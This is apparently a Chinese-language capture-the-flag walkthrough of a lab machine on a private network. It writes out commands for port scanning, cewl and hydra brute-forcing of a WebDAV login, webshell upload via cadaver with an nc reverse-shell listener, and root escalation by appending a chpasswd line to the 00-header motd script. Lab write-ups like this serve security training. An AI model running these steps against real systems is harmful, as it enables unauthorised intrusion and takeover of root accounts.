简介

攻击机ip：192.168.255.139
靶机ip： 192.168.255.142
靶机下载地址：

开始

使用nmap找到靶机地址并扫描端口

找到靶机ip，使用nmap -sV -Pn -p- -v 192.168.255.142进行端口扫描

发现开启了个80跟22端口,访问一下80端口：

什么都没有，再看看有没有敏感目录

发现了一个401登录界面

利用cewl生成字典 cewl 192.168.255.142 -w 1.txt

再使用hydra工具进行**hydra -L 1.txt -P 1.txt 192.168.255.142 http-get /webdav

接下来进行登录：

什么都没有。。。。。。
后来看了其他小伙伴的做法，这里是可以读写的，利用cadaver客户端程序可以进行shell的上传，不过他是以命令形式实现的。
这里我们先用cadaver登录webdav并上传木马获取shell

cadaver http://192.168.255.142/webdav

上传之后，开启监听端口并访问木马路径就可以回去到shell了
nc -lvvp 1234

查看当前权限

whoami

这里先获取一个python的标准shell

python3 -c ‘import pty;pty.spawn("/bin/bash")’

查看到一个hell.sh文件

经过解码，得到一个可能是个账号或者密码的东西：chitragupt

查看用户试试能不能远程登进去，一共三个用户分别是inferno ,narak,yamdoot
使用ssh远程登录：

没想到第一个用户就成功了，查看到有一个users.txt文件

你以为就结束了？？？？
不我们还没有获取root权限
现在我们要通过修改ssh登陆时的欢迎信息对root密码进行修改,修改的文件是00-header文件在/etc/update-motd.d目录下。

echo “echo ‘root:admin’ | sudo chpasswd” >> 00-header

修改完成后 退出重新登录一下就可以用su命令获取到root权限了

可以看到现在就是root权限了，最后打开我们的root.txt文件就通关了。